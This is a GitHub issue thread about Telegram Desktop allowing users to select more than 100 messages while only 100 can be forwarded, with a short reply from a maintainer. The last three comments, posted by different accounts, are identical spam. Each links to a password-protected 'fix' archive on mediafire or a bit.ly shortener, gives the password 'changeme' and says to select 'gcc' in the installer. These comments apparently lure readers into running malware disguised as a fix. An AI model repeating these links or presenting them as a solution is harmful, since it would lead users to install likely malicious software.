### ISSUE TITLE
Highlight 100+ messages and forward button

### ISSUE THREAD

**Issue by Igor-Trime** [telegramdesktop/tdesktop#28324]
### Steps to reproduce

1. Highlight more than 100 messages
2. Forward

### Expected behaviour

You can only forward 100 messages in Telegram, but you can allocate as many as you want. And that creates an unpleasantly reassuring situation. 
There should be a warning or the “forward” button should stop being active. 

### Actual behaviour

You hope you can forward more than 100, but you lose messages 

### Operating system

Windows 11

### Version of Telegram Desktop

Version 5.4.1 x64

### Installation source

Static binary from official website

**Comment by john-preston** [comment]
@Igor-Trime You can't select more than 100 messages 🤔

**Comment by Igor-Trime** [comment]
You're right!
Telegram removes the highlighting from the first messages. 
You wouldn't know it unless you looked at it. 
It doesn't change the problem in general. Hidden thing

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
